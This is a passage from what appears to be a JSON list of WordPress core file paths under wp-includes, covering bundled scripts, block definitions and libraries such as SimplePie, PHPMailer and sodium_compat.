    "wp-includes/js/dist/vendor/wp-polyfill-inert.min.js",
    "wp-includes/js/dist/vendor/wp-polyfill-fetch.min.js",
    "wp-includes/js/dist/vendor/wp-polyfill-inert.js",
    "wp-includes/js/dist/vendor/react-dom.js",
    "wp-includes/js/dist/vendor/wp-polyfill-formdata.min.js",
    "wp-includes/js/dist/vendor/regenerator-runtime.js",
    "wp-includes/js/dist/vendor/react-dom.min.js",
    "wp-includes/js/dist/vendor/wp-polyfill-element-closest.js",
    "wp-includes/js/dist/vendor/wp-polyfill-fetch.js",
    "wp-includes/js/dist/vendor/lodash.js",
    "wp-includes/js/dist/vendor/wp-polyfill-node-contains.js",
    "wp-includes/js/dist/vendor/wp-polyfill-object-fit.min.js",
    "wp-includes/js/dist/vendor/wp-polyfill-element-closest.min.js",
    "wp-includes/js/dist/vendor/react-jsx-runtime.min.js.LICENSE.txt",
    "wp-includes/js/dist/vendor/wp-polyfill-dom-rect.min.js",
    "wp-includes/js/dist/vendor/wp-polyfill.min.js",
    "wp-includes/js/dist/vendor/react.js",
    "wp-includes/js/dist/vendor/regenerator-runtime.min.js",
    "wp-includes/js/dist/vendor/react-jsx-runtime.min.js",
    "wp-includes/js/dist/deprecated.min.js",
    "wp-includes/js/dist/i18n.js",
    "wp-includes/js/dist/url.min.js",
    "wp-includes/js/dist/keyboard-shortcuts.js",
    "wp-includes/js/dist/element.js",
    "wp-includes/js/dist/core-commands.js",
    "wp-includes/js/dist/private-apis.min.js",
    "wp-includes/js/dist/edit-post.js",
    "wp-includes/js/dist/block-library.min.js",
    "wp-includes/js/dist/viewport.min.js",
    "wp-includes/js/dist/html-entities.js",
    "wp-includes/js/dist/shortcode.js",
    "wp-includes/js/dist/widgets.js",
    "wp-includes/js/dist/customize-widgets.min.js",
    "wp-includes/js/dist/keycodes.min.js",
    "wp-includes/js/dist/preferences-persistence.min.js",
    "wp-includes/js/dist/core-data.js",
    "wp-includes/js/dist/development/react-refresh-entry.js",
    "wp-includes/js/dist/development/react-refresh-runtime.min.js",
    "wp-includes/js/dist/development/react-refresh-runtime.js",
    "wp-includes/js/dist/development/react-refresh-entry.min.js",
    "wp-includes/js/dist/router.min.js",
    "wp-includes/js/dist/is-shallow-equal.min.js",
    "wp-includes/js/dist/style-engine.min.js",
    "wp-includes/js/dist/hooks.js",
    "wp-includes/js/dist/keycodes.js",
    "wp-includes/js/dist/compose.js",
    "wp-includes/js/dist/html-entities.min.js",
    "wp-includes/js/dist/reusable-blocks.min.js",
    "wp-includes/js/dist/annotations.js",
    "wp-includes/js/dist/data-controls.js",
    "wp-includes/js/dist/reusable-blocks.js",
    "wp-includes/js/dist/core-data.min.js",
    "wp-includes/js/dist/data.min.js",
    "wp-includes/js/dist/dom.js",
    "wp-includes/js/dist/warning.min.js",
    "wp-includes/js/dist/style-engine.js",
    "wp-includes/js/dist/nux.min.js",
    "wp-includes/js/dist/priority-queue.min.js",
    "wp-includes/js/dist/preferences-persistence.js",
    "wp-includes/js/dist/url.js",
    "wp-includes/js/dist/edit-site.min.js",
    "wp-includes/js/dist/dom-ready.js",
    "wp-includes/js/dist/block-serialization-default-parser.js",
    "wp-includes/js/dist/data.js",
    "wp-includes/js/dist/dom.min.js",
    "wp-includes/js/dist/priority-queue.js",
    "wp-includes/js/dist/script-modules/interactivity-router/index.min.js",
    "wp-includes/js/dist/script-modules/interactivity-router/index.js",
    "wp-includes/js/dist/script-modules/interactivity/index.min.js",
    "wp-includes/js/dist/script-modules/interactivity/debug.min.js",
    "wp-includes/js/dist/script-modules/interactivity/debug.js",
    "wp-includes/js/dist/script-modules/interactivity/index.js",
    "wp-includes/js/dist/script-modules/block-library/query/view.js",
    "wp-includes/js/dist/script-modules/block-library/query/view.min.js",
    "wp-includes/js/dist/script-modules/block-library/search/view.js",
    "wp-includes/js/dist/script-modules/block-library/search/view.min.js",
    "wp-includes/js/dist/script-modules/block-library/file/view.js",
    "wp-includes/js/dist/script-modules/block-library/file/view.min.js",
    "wp-includes/js/dist/script-modules/block-library/image/view.js",
    "wp-includes/js/dist/script-modules/block-library/image/view.min.js",
    "wp-includes/js/dist/script-modules/block-library/navigation/view.js",
    "wp-includes/js/dist/script-modules/block-library/navigation/view.min.js",
    "wp-includes/js/dist/script-modules/block-library/form/view.js",
    "wp-includes/js/dist/script-modules/block-library/form/view.min.js",
    "wp-includes/js/dist/script-modules/a11y/index.min.js",
    "wp-includes/js/dist/script-modules/a11y/index.js",
    "wp-includes/js/dist/blob.js",
    "wp-includes/js/dist/api-fetch.min.js",
    "wp-includes/js/dist/viewport.js",
    "wp-includes/js/dist/components.js",
    "wp-includes/js/dist/deprecated.js",
    "wp-includes/js/dist/private-apis.js",
    "wp-includes/js/dist/autop.min.js",
    "wp-includes/js/dist/wordcount.js",
    "wp-includes/js/dist/format-library.min.js",
    "wp-includes/js/dist/dom-ready.min.js",
    "wp-includes/js/dist/edit-widgets.min.js",
    "wp-includes/js/dist/commands.js",
    "wp-includes/js/dist/data-controls.min.js",
    "wp-includes/js/dist/format-library.js",
    "wp-includes/js/dist/block-serialization-default-parser.min.js",
    "wp-includes/js/dist/wordcount.min.js",
    "wp-includes/js/dist/plugins.min.js",
    "wp-includes/js/dist/keyboard-shortcuts.min.js",
    "wp-includes/js/dist/edit-site.js",
    "wp-includes/js/dist/i18n.min.js",
    "wp-includes/js/dist/rich-text.min.js",
    "wp-includes/js/dist/preferences.min.js",
    "wp-includes/js/dist/block-library.js",
    "wp-includes/js/dist/a11y.js",
    "wp-includes/js/dist/list-reusable-blocks.min.js",
    "wp-includes/js/dist/date.js",
    "wp-includes/js/dist/edit-post.min.js",
    "wp-includes/js/dist/escape-html.js",
    "wp-includes/js/dist/editor.min.js",
    "wp-includes/js/dist/token-list.js",
    "wp-includes/js/dist/router.js",
    "wp-includes/js/dist/plugins.js",
    "wp-includes/js/dist/commands.min.js",
    "wp-includes/js/dist/media-utils.min.js",
    "wp-includes/js/dist/a11y.min.js",
    "wp-includes/js/dist/server-side-render.min.js",
    "wp-includes/js/dist/primitives.js",
    "wp-includes/js/dist/block-editor.min.js",
    "wp-includes/js/dist/autop.js",
    "wp-includes/js/dist/compose.min.js",
    "wp-includes/js/dist/block-directory.js",
    "wp-includes/js/dist/annotations.min.js",
    "wp-includes/js/dist/block-editor.js",
    "wp-includes/js/dist/redux-routine.js",
    "wp-includes/js/dist/list-reusable-blocks.js",
    "wp-includes/js/dist/warning.js",
    "wp-includes/js/dist/is-shallow-equal.js",
    "wp-includes/js/dist/notices.min.js",
    "wp-includes/js/dist/blocks.js",
    "wp-includes/js/dist/notices.js",
    "wp-includes/js/dist/date.min.js",
    "wp-includes/js/dist/block-directory.min.js",
    "wp-includes/js/dist/blocks.min.js",
    "wp-includes/js/dist/server-side-render.js",
    "wp-includes/js/dist/preferences.js",
    "wp-includes/js/dist/nux.js",
    "wp-includes/js/dist/blob.min.js",
    "wp-includes/js/dist/media-utils.js",
    "wp-includes/js/dist/escape-html.min.js",
    "wp-includes/js/dist/widgets.min.js",
    "wp-includes/js/dist/token-list.min.js",
    "wp-includes/js/dist/primitives.min.js",
    "wp-includes/js/dist/api-fetch.js",
    "wp-includes/js/dist/element.min.js",
    "wp-includes/js/tinymce/themes/inlite/theme.min.js",
    "wp-includes/js/tinymce/themes/inlite/theme.js",
    "wp-includes/js/tinymce/themes/modern/theme.min.js",
    "wp-includes/js/tinymce/themes/modern/theme.js",
    "wp-includes/js/tinymce/skins/lightgray/fonts/tinymce-small.eot",
    "wp-includes/js/tinymce/skins/lightgray/fonts/tinymce-small.ttf",
    "wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.eot",
    "wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.woff",
    "wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.svg",
    "wp-includes/js/tinymce/skins/lightgray/fonts/tinymce-small.svg",
    "wp-includes/js/tinymce/skins/lightgray/fonts/tinymce-small.woff",
    "wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.ttf",
    "wp-includes/js/tinymce/skins/wordpress/images/script.svg",
    "wp-includes/js/tinymce/skins/wordpress/images/style.svg",
    "wp-includes/js/tinymce/tiny_mce_popup.js",
    "wp-includes/js/tinymce/wp-tinymce.js",
    "wp-includes/js/tinymce/wp-tinymce.php",
    "wp-includes/js/tinymce/license.txt",
    "wp-includes/js/tinymce/langs/wp-langs-en.js",
    "wp-includes/js/tinymce/utils/validate.js",
    "wp-includes/js/tinymce/utils/form_utils.js",
    "wp-includes/js/tinymce/utils/mctabs.js",
    "wp-includes/js/tinymce/utils/editable_selects.js",
    "wp-includes/js/tinymce/plugins/textcolor/plugin.min.js",
    "wp-includes/js/tinymce/plugins/textcolor/plugin.js",
    "wp-includes/js/tinymce/plugins/directionality/plugin.min.js",
    "wp-includes/js/tinymce/plugins/directionality/plugin.js",
    "wp-includes/js/tinymce/plugins/wpautoresize/plugin.min.js",
    "wp-includes/js/tinymce/plugins/wpautoresize/plugin.js",
    "wp-includes/js/tinymce/plugins/wpeditimage/plugin.min.js",
    "wp-includes/js/tinymce/plugins/wpeditimage/plugin.js",
    "wp-includes/js/tinymce/plugins/colorpicker/plugin.min.js",
    "wp-includes/js/tinymce/plugins/colorpicker/plugin.js",
    "wp-includes/js/tinymce/plugins/wptextpattern/plugin.min.js",
    "wp-includes/js/tinymce/plugins/wptextpattern/plugin.js",
    "wp-includes/js/tinymce/plugins/hr/plugin.min.js",
    "wp-includes/js/tinymce/plugins/hr/plugin.js",
    "wp-includes/js/tinymce/plugins/wplink/plugin.min.js",
    "wp-includes/js/tinymce/plugins/wplink/plugin.js",
    "wp-includes/js/tinymce/plugins/image/plugin.min.js",
    "wp-includes/js/tinymce/plugins/image/plugin.js",
    "wp-includes/js/tinymce/plugins/wpview/plugin.min.js",
    "wp-includes/js/tinymce/plugins/wpview/plugin.js",
    "wp-includes/js/tinymce/plugins/wpgallery/plugin.min.js",
    "wp-includes/js/tinymce/plugins/wpgallery/plugin.js",
    "wp-includes/js/tinymce/plugins/media/plugin.min.js",
    "wp-includes/js/tinymce/plugins/media/plugin.js",
    "wp-includes/js/tinymce/plugins/compat3x/plugin.min.js",
    "wp-includes/js/tinymce/plugins/compat3x/plugin.js",
    "wp-includes/js/tinymce/plugins/charmap/plugin.min.js",
    "wp-includes/js/tinymce/plugins/charmap/plugin.js",
    "wp-includes/js/tinymce/plugins/wpdialogs/plugin.min.js",
    "wp-includes/js/tinymce/plugins/wpdialogs/plugin.js",
    "wp-includes/js/tinymce/plugins/link/plugin.min.js",
    "wp-includes/js/tinymce/plugins/link/plugin.js",
    "wp-includes/js/tinymce/plugins/tabfocus/plugin.min.js",
    "wp-includes/js/tinymce/plugins/tabfocus/plugin.js",
    "wp-includes/js/tinymce/plugins/wordpress/plugin.min.js",
    "wp-includes/js/tinymce/plugins/wordpress/plugin.js",
    "wp-includes/js/tinymce/plugins/fullscreen/plugin.min.js",
    "wp-includes/js/tinymce/plugins/fullscreen/plugin.js",
    "wp-includes/js/tinymce/plugins/wpemoji/plugin.min.js",
    "wp-includes/js/tinymce/plugins/wpemoji/plugin.js",
    "wp-includes/js/tinymce/plugins/paste/plugin.min.js",
    "wp-includes/js/tinymce/plugins/paste/plugin.js",
    "wp-includes/js/tinymce/plugins/lists/plugin.min.js",
    "wp-includes/js/tinymce/plugins/lists/plugin.js",
    "wp-includes/js/tinymce/tinymce.min.js",
    "wp-includes/js/wp-auth-check.js",
    "wp-includes/js/wp-emoji-release.min.js",
    "wp-includes/js/zxcvbn-async.js",
    "wp-includes/js/crop/cropper.js",
    "wp-includes/js/wp-emoji.min.js",
    "wp-includes/js/customize-loader.js",
    "wp-includes/js/customize-preview-nav-menus.js",
    "wp-includes/js/customize-selective-refresh.min.js",
    "wp-includes/js/wp-lists.min.js",
    "wp-includes/js/swfobject.min.js",
    "wp-includes/js/media-audiovideo.js",
    "wp-includes/js/customize-preview.js",
    "wp-includes/js/utils.js",
    "wp-includes/js/wp-list-revisions.min.js",
    "wp-includes/js/customize-preview.min.js",
    "wp-includes/js/wp-ajax-response.min.js",
    "wp-includes/js/backbone.js",
    "wp-includes/js/tw-sack.min.js",
    "wp-includes/js/wplink.min.js",
    "wp-includes/js/wp-embed-template.min.js",
    "wp-includes/js/wp-emoji-loader.min.js",
    "wp-includes/js/wp-emoji-loader.js",
    "wp-includes/js/wp-lists.js",
    "wp-includes/js/admin-bar.min.js",
    "wp-includes/option.php",
    "wp-includes/class-wp-scripts.php",
    "wp-includes/https-detection.php",
    "wp-includes/class-wp-editor.php",
    "wp-includes/pomo/entry.php",
    "wp-includes/pomo/translations.php",
    "wp-includes/pomo/mo.php",
    "wp-includes/pomo/po.php",
    "wp-includes/pomo/streams.php",
    "wp-includes/pomo/plural-forms.php",
    "wp-includes/cache.php",
    "wp-includes/class-wp-locale.php",
    "wp-includes/widgets.php",
    "wp-includes/session.php",
    "wp-includes/bookmark-template.php",
    "wp-includes/block-i18n.json",
    "wp-includes/blocks/query-pagination.php",
    "wp-includes/blocks/comments-pagination-numbers/block.json",
    "wp-includes/blocks/widget-group.php",
    "wp-includes/blocks/column/block.json",
    "wp-includes/blocks/heading/block.json",
    "wp-includes/blocks/query-title/block.json",
    "wp-includes/blocks/comments.php",
    "wp-includes/blocks/home-link.php",
    "wp-includes/blocks/pattern/block.json",
    "wp-includes/blocks/avatar/block.json",
    "wp-includes/blocks/missing/block.json",
    "wp-includes/blocks/buttons/block.json",
    "wp-includes/blocks/cover/block.json",
    "wp-includes/blocks/latest-comments/block.json",
    "wp-includes/blocks/read-more.php",
    "wp-includes/blocks/comments-pagination-next/block.json",
    "wp-includes/blocks/query-pagination-numbers.php",
    "wp-includes/blocks/social-links/block.json",
    "wp-includes/blocks/freeform/block.json",
    "wp-includes/blocks/site-tagline.php",
    "wp-includes/blocks/template-part/block.json",
    "wp-includes/blocks/post-terms.php",
    "wp-includes/blocks/pullquote/block.json",
    "wp-includes/blocks/heading.php",
    "wp-includes/blocks/block/block.json",
    "wp-includes/blocks/comment-author-name/block.json",
    "wp-includes/blocks/media-text/block.json",
    "wp-includes/blocks/social-link.php",
    "wp-includes/blocks/video/block.json",
    "wp-includes/blocks/post-date/block.json",
    "wp-includes/blocks/details/block.json",
    "wp-includes/blocks/post-author-biography/block.json",
    "wp-includes/blocks/post-terms/block.json",
    "wp-includes/blocks/columns/block.json",
    "wp-includes/blocks/query/block.json",
    "wp-includes/blocks/query/view.asset.php",
    "wp-includes/blocks/query/view.js",
    "wp-includes/blocks/query/view.min.js",
    "wp-includes/blocks/query/view.min.asset.php",
    "wp-includes/blocks/comments-pagination-numbers.php",
    "wp-includes/blocks/archives/block.json",
    "wp-includes/blocks/comment-template/block.json",
    "wp-includes/blocks/search/block.json",
    "wp-includes/blocks/search/view.asset.php",
    "wp-includes/blocks/search/view.js",
    "wp-includes/blocks/search/view.min.js",
    "wp-includes/blocks/search/view.min.asset.php",
    "wp-includes/blocks/group/block.json",
    "wp-includes/blocks/code/block.json",
    "wp-includes/blocks/comment-template.php",
    "wp-includes/blocks/require-static-blocks.php",
    "wp-includes/blocks/paragraph/block.json",
    "wp-includes/blocks/query-title.php",
    "wp-includes/blocks/calendar.php",
    "wp-includes/blocks/site-logo/block.json",
    "wp-includes/blocks/preformatted/block.json",
    "wp-includes/blocks/page-list-item/block.json",
    "wp-includes/blocks/template-part.php",
    "wp-includes/blocks/text-columns/block.json",
    "wp-includes/blocks/comments-pagination-previous/block.json",
    "wp-includes/blocks/tag-cloud/block.json",
    "wp-includes/blocks/navigation.php",
    "wp-includes/blocks/file/block.json",
    "wp-includes/blocks/file/view.asset.php",
    "wp-includes/blocks/file/view.js",
    "wp-includes/blocks/file/view.min.js",
    "wp-includes/blocks/file/view.min.asset.php",
    "wp-includes/blocks/legacy-widget/block.json",
    "wp-includes/blocks/table/block.json",
    "wp-includes/blocks/image/block.json",
    "wp-includes/blocks/image/view.asset.php",
    "wp-includes/blocks/image/view.js",
    "wp-includes/blocks/image/view.min.js",
    "wp-includes/blocks/image/view.min.asset.php",
    "wp-includes/blocks/loginout/block.json",
    "wp-includes/blocks/navigation-submenu.php",
    "wp-includes/blocks/post-content/block.json",
    "wp-includes/blocks/comment-edit-link.php",
    "wp-includes/blocks/html/block.json",
    "wp-includes/blocks/post-excerpt.php",
    "wp-includes/blocks/pattern.php",
    "wp-includes/blocks/post-date.php",
    "wp-includes/blocks/page-list.php",
    "wp-includes/blocks/query.php",
    "wp-includes/blocks/navigation-link/block.json",
    "wp-includes/blocks/page-list/block.json",
    "wp-includes/blocks/post-author-name.php",
    "wp-includes/blocks/loginout.php",
    "wp-includes/blocks/post-title.php",
    "wp-includes/blocks/media-text.php",
    "wp-includes/blocks/post-title/block.json",
    "wp-includes/blocks/more/block.json",
    "wp-includes/blocks/button/block.json",
    "wp-includes/blocks/comment-reply-link.php",
    "wp-includes/blocks/tag-cloud.php",
    "wp-includes/blocks/site-logo.php",
    "wp-includes/blocks/gallery/block.json",
    "wp-includes/blocks/comments-pagination-previous.php",
    "wp-includes/blocks/audio/block.json",
    "wp-includes/blocks/list-item/block.json",
    "wp-includes/blocks/post-comments-form/block.json",
    "wp-includes/blocks/navigation/view-modal.asset.php",
    "wp-includes/blocks/navigation/block.json",
    "wp-includes/blocks/navigation/view.asset.php",
    "wp-includes/blocks/navigation/view.js",
    "wp-includes/blocks/navigation/view.min.js",
    "wp-includes/blocks/navigation/view.min.asset.php",
    "wp-includes/blocks/navigation/view-modal.min.asset.php",
    "wp-includes/blocks/post-comments-form.php",
    "wp-includes/blocks/require-dynamic-blocks.php",
    "wp-includes/blocks/read-more/block.json",
    "wp-includes/blocks/post-author/block.json",
    "wp-includes/blocks/comments-title.php",
    "wp-includes/blocks/comments/block.json",
    "wp-includes/blocks/list/block.json",
    "wp-includes/blocks/query-pagination-numbers/block.json",
    "wp-includes/blocks/latest-posts.php",
    "wp-includes/blocks/categories.php",
    "wp-includes/blocks/post-featured-image/block.json",
    "wp-includes/blocks/site-title.php",
    "wp-includes/blocks/archives.php",
    "wp-includes/blocks/query-total.php",
    "wp-includes/blocks/navigation-submenu/block.json",
    "wp-includes/blocks/query-pagination-next/block.json",
    "wp-includes/blocks/post-navigation-link.php",
    "wp-includes/blocks/categories/block.json",
    "wp-includes/blocks/footnotes/block.json",
    "wp-includes/blocks/post-excerpt/block.json",
    "wp-includes/blocks/page-list-item.php",
    "wp-includes/blocks/query-total/block.json",
    "wp-includes/blocks/legacy-widget.php",
    "wp-includes/blocks/block.php",
    "wp-includes/blocks/query-pagination-next.php",
    "wp-includes/blocks/comment-date/block.json",
    "wp-includes/blocks/embed/block.json",
    "wp-includes/blocks/quote/block.json",
    "wp-includes/blocks/post-featured-image.php",
    "wp-includes/blocks/query-pagination/block.json",
    "wp-includes/blocks/comment-date.php",
    "wp-includes/blocks/latest-posts/block.json",
    "wp-includes/blocks/term-description/block.json",
    "wp-includes/blocks/nextpage/block.json",
    "wp-includes/blocks/post-navigation-link/block.json",
    "wp-includes/blocks/post-author-biography.php",
    "wp-includes/blocks/shortcode/block.json",
    "wp-includes/blocks/file.php",
    "wp-includes/blocks/post-content.php",
    "wp-includes/blocks/rss/block.json",
    "wp-includes/blocks/query-no-results.php",
    "wp-includes/blocks/separator/block.json",
    "wp-includes/blocks/search.php",
    "wp-includes/blocks/navigation-link.php",
    "wp-includes/blocks/avatar.php",
    "wp-includes/blocks/comments-pagination/block.json",
    "wp-includes/blocks/site-title/block.json",
    "wp-includes/blocks/comment-reply-link/block.json",
    "wp-includes/blocks/social-link/block.json",
    "wp-includes/blocks/verse/block.json",
    "wp-includes/blocks/rss.php",
    "wp-includes/blocks/footnotes.php",
    "wp-includes/blocks/comments-pagination.php",
    "wp-includes/blocks/post-template/block.json",
    "wp-includes/blocks/shortcode.php",
    "wp-includes/blocks/comment-content/block.json",
    "wp-includes/blocks/comments-title/block.json",
    "wp-includes/blocks/comments-pagination-next.php",
    "wp-includes/blocks/home-link/block.json",
    "wp-includes/blocks/index.php",
    "wp-includes/blocks/button.php",
    "wp-includes/blocks/query-pagination-previous/block.json",
    "wp-includes/blocks/calendar/block.json",
    "wp-includes/blocks/latest-comments.php",
    "wp-includes/blocks/query-pagination-previous.php",
    "wp-includes/blocks/image.php",
    "wp-includes/blocks/blocks-json.php",
    "wp-includes/blocks/widget-group/block.json",
    "wp-includes/blocks/cover.php",
    "wp-includes/blocks/list.php",
    "wp-includes/blocks/term-description.php",
    "wp-includes/blocks/post-template.php",
    "wp-includes/blocks/site-tagline/block.json",
    "wp-includes/blocks/comment-edit-link/block.json",
    "wp-includes/blocks/spacer/block.json",
    "wp-includes/blocks/gallery.php",
    "wp-includes/blocks/query-no-results/block.json",
    "wp-includes/blocks/post-author.php",
    "wp-includes/blocks/post-author-name/block.json",
    "wp-includes/blocks/comment-content.php",
    "wp-includes/blocks/comment-author-name.php",
    "wp-includes/version.php",
    "wp-includes/class-wp-http-requests-response.php",
    "wp-includes/class-wp-block-styles-registry.php",
    "wp-includes/cache-compat.php",
    "wp-includes/class-wp-block-parser.php",
    "wp-includes/class-wp-exception.php",
    "wp-includes/class-walker-page.php",
    "wp-includes/general-template.php",
    "wp-includes/ms-default-constants.php",
    "wp-includes/class-wp-theme-json.php",
    "wp-includes/class-wp-comment-query.php",
    "wp-includes/block-supports/settings.php",
    "wp-includes/block-supports/border.php",
    "wp-includes/block-supports/typography.php",
    "wp-includes/block-supports/utils.php",
    "wp-includes/block-supports/dimensions.php",
    "wp-includes/block-supports/generated-classname.php",
    "wp-includes/block-supports/align.php",
    "wp-includes/block-supports/background.php",
    "wp-includes/block-supports/custom-classname.php",
    "wp-includes/block-supports/colors.php",
    "wp-includes/block-supports/elements.php",
    "wp-includes/block-supports/aria-label.php",
    "wp-includes/block-supports/position.php",
    "wp-includes/block-supports/spacing.php",
    "wp-includes/block-supports/layout.php",
    "wp-includes/block-supports/shadow.php",
    "wp-includes/block-supports/duotone.php",
    "wp-includes/block-supports/block-style-variations.php",
    "wp-includes/pluggable-deprecated.php",
    "wp-includes/ms-blogs.php",
    "wp-includes/class-IXR.php",
    "wp-includes/media.php",
    "wp-includes/theme-templates.php",
    "wp-includes/class-wpdb.php",
    "wp-includes/class-wp-http-ixr-client.php",
    "wp-includes/class-wp-matchesmapregex.php",
    "wp-includes/class-wp-admin-bar.php",
    "wp-includes/ms-load.php",
    "wp-includes/link-template.php",
    "wp-includes/class-wp-rewrite.php",
    "wp-includes/SimplePie/src/RegistryAware.php",
    "wp-includes/SimplePie/src/Author.php",
    "wp-includes/SimplePie/src/Gzdecode.php",
    "wp-includes/SimplePie/src/Source.php",
    "wp-includes/SimplePie/src/Net/IPv6.php",
    "wp-includes/SimplePie/src/Category.php",
    "wp-includes/SimplePie/src/Content/Type/Sniffer.php",
    "wp-includes/SimplePie/src/Cache/Psr16.php",
    "wp-includes/SimplePie/src/Cache/Base.php",
    "wp-includes/SimplePie/src/Cache/BaseDataCache.php",
    "wp-includes/SimplePie/src/Cache/DB.php",
    "wp-includes/SimplePie/src/Cache/File.php",
    "wp-includes/SimplePie/src/Cache/Redis.php",
    "wp-includes/SimplePie/src/Cache/Memcache.php",
    "wp-includes/SimplePie/src/Cache/DataCache.php",
    "wp-includes/SimplePie/src/Cache/Memcached.php",
    "wp-includes/SimplePie/src/Cache/MySQL.php",
    "wp-includes/SimplePie/src/Cache/NameFilter.php",
    "wp-includes/SimplePie/src/Cache/CallableNameFilter.php",
    "wp-includes/SimplePie/src/Registry.php",
    "wp-includes/SimplePie/src/Parser.php",
    "wp-includes/SimplePie/src/HTTP/Parser.php",
    "wp-includes/SimplePie/src/Item.php",
    "wp-includes/SimplePie/src/Locator.php",
    "wp-includes/SimplePie/src/SimplePie.php",
    "wp-includes/SimplePie/src/Rating.php",
    "wp-includes/SimplePie/src/Copyright.php",
    "wp-includes/SimplePie/src/Credit.php",
    "wp-includes/SimplePie/src/Caption.php",
    "wp-includes/SimplePie/src/File.php",
    "wp-includes/SimplePie/src/Enclosure.php",
    "wp-includes/SimplePie/src/Parse/Date.php",
    "wp-includes/SimplePie/src/Decode/HTML/Entities.php",
    "wp-includes/SimplePie/src/XML/Declaration/Parser.php",
    "wp-includes/SimplePie/src/Exception.php",
    "wp-includes/SimplePie/src/Core.php",
    "wp-includes/SimplePie/src/Cache.php",
    "wp-includes/SimplePie/src/Restriction.php",
    "wp-includes/SimplePie/src/Sanitize.php",
    "wp-includes/SimplePie/src/IRI.php",
    "wp-includes/SimplePie/src/Misc.php",
    "wp-includes/SimplePie/library/SimplePie.php",
    "wp-includes/SimplePie/library/SimplePie/Author.php",
    "wp-includes/SimplePie/library/SimplePie/Source.php",
    "wp-includes/SimplePie/library/SimplePie/Net/IPv6.php",
    "wp-includes/SimplePie/library/SimplePie/Category.php",
    "wp-includes/SimplePie/library/SimplePie/Content/Type/Sniffer.php",
    "wp-includes/SimplePie/library/SimplePie/Cache/Base.php",
    "wp-includes/SimplePie/library/SimplePie/Cache/DB.php",
    "wp-includes/SimplePie/library/SimplePie/Cache/File.php",
    "wp-includes/SimplePie/library/SimplePie/Cache/Redis.php",
    "wp-includes/SimplePie/library/SimplePie/Cache/Memcache.php",
    "wp-includes/SimplePie/library/SimplePie/Cache/Memcached.php",
    "wp-includes/SimplePie/library/SimplePie/Cache/MySQL.php",
    "wp-includes/SimplePie/library/SimplePie/Registry.php",
    "wp-includes/SimplePie/library/SimplePie/Parser.php",
    "wp-includes/SimplePie/library/SimplePie/HTTP/Parser.php",
    "wp-includes/SimplePie/library/SimplePie/Item.php",
    "wp-includes/SimplePie/library/SimplePie/gzdecode.php",
    "wp-includes/SimplePie/library/SimplePie/Locator.php",
    "wp-includes/SimplePie/library/SimplePie/Rating.php",
    "wp-includes/SimplePie/library/SimplePie/Copyright.php",
    "wp-includes/SimplePie/library/SimplePie/Credit.php",
    "wp-includes/SimplePie/library/SimplePie/Caption.php",
    "wp-includes/SimplePie/library/SimplePie/File.php",
    "wp-includes/SimplePie/library/SimplePie/Enclosure.php",
    "wp-includes/SimplePie/library/SimplePie/Parse/Date.php",
    "wp-includes/SimplePie/library/SimplePie/Decode/HTML/Entities.php",
    "wp-includes/SimplePie/library/SimplePie/XML/Declaration/Parser.php",
    "wp-includes/SimplePie/library/SimplePie/Exception.php",
    "wp-includes/SimplePie/library/SimplePie/Core.php",
    "wp-includes/SimplePie/library/SimplePie/Cache.php",
    "wp-includes/SimplePie/library/SimplePie/Restriction.php",
    "wp-includes/SimplePie/library/SimplePie/Sanitize.php",
    "wp-includes/SimplePie/library/SimplePie/IRI.php",
    "wp-includes/SimplePie/library/SimplePie/Misc.php",
    "wp-includes/SimplePie/autoloader.php",
    "wp-includes/class-wp-error.php",
    "wp-includes/PHPMailer/SMTP.php",
    "wp-includes/PHPMailer/Exception.php",
    "wp-includes/PHPMailer/PHPMailer.php",
    "wp-includes/class-wp-object-cache.php",
    "wp-includes/class-wp-tax-query.php",
    "wp-includes/class-wp-term-query.php",
    "wp-includes/class-wp-block-list.php",
    "wp-includes/default-widgets.php",
    "wp-includes/class-wp-text-diff-renderer-table.php",
    "wp-includes/post-thumbnail-template.php",
    "wp-includes/comment.php",
    "wp-includes/https-migration.php",
    "wp-includes/block-bindings.php",
    "wp-includes/class-wp-oembed.php",
    "wp-includes/sodium_compat/src/Compat.php",
    "wp-includes/sodium_compat/src/Core/Ed25519.php",
    "wp-includes/sodium_compat/src/Core/AEGIS256.php",
    "wp-includes/sodium_compat/src/Core/Curve25519.php",
    "wp-includes/sodium_compat/src/Core/XSalsa20.php",
    "wp-includes/sodium_compat/src/Core/AES/Block.php",
    "wp-includes/sodium_compat/src/Core/AES/KeySchedule.php",
    "wp-includes/sodium_compat/src/Core/AES/Expanded.php",
    "wp-includes/sodium_compat/src/Core/AES.php",
    "wp-includes/sodium_compat/src/Core/Util.php",
    "wp-includes/sodium_compat/src/Core/AEGIS128L.php",
    "wp-includes/sodium_compat/src/Core/ChaCha20.php",
    "wp-includes/sodium_compat/src/Core/Curve25519/Fe.php",
    "wp-includes/sodium_compat/src/Core/Curve25519/README.md",
    "wp-includes/sodium_compat/src/Core/Curve25519/H.php",
    "wp-includes/sodium_compat/src/Core/Curve25519/Ge/Precomp.php",
    "wp-includes/sodium_compat/src/Core/Curve25519/Ge/P2.php",
    "wp-includes/sodium_compat/src/Core/Curve25519/Ge/P1p1.php",
    "wp-includes/sodium_compat/src/Core/Curve25519/Ge/P3.php",
    "wp-includes/sodium_compat/src/Core/Curve25519/Ge/Cached.php",
    "wp-includes/sodium_compat/src/Core/XChaCha20.php",
    "wp-includes/sodium_compat/src/Core/HSalsa20.php",
    "wp-includes/sodium_compat/src/Core/ChaCha20/Ctx.php",
    "wp-includes/sodium_compat/src/Core/ChaCha20/IetfCtx.php",
    "wp-includes/sodium_compat/src/Core/BLAKE2b.php",
    "wp-includes/sodium_compat/src/Core/Salsa20.php",
    "wp-includes/sodium_compat/src/Core/Poly1305/State.php",
    "wp-includes/sodium_compat/src/Core/X25519.php",
    "wp-includes/sodium_compat/src/Core/Base64/Original.php",
    "wp-includes/sodium_compat/src/Core/Base64/UrlSafe.php",
    "wp-includes/sodium_compat/src/Core/Poly1305.php",
    "wp-includes/sodium_compat/src/Core/HChaCha20.php",
    "wp-includes/sodium_compat/src/Core/Ristretto255.php",
    "wp-includes/sodium_compat/src/Core/AEGIS/State256.php",
    "wp-includes/sodium_compat/src/Core/AEGIS/State128L.php",
    "wp-includes/sodium_compat/src/Core/SipHash.php",
    "wp-includes/sodium_compat/src/Core/SecretStream/State.php",
    "wp-includes/sodium_compat/src/SodiumException.php",
    "wp-includes/sodium_compat/src/Crypto32.php",
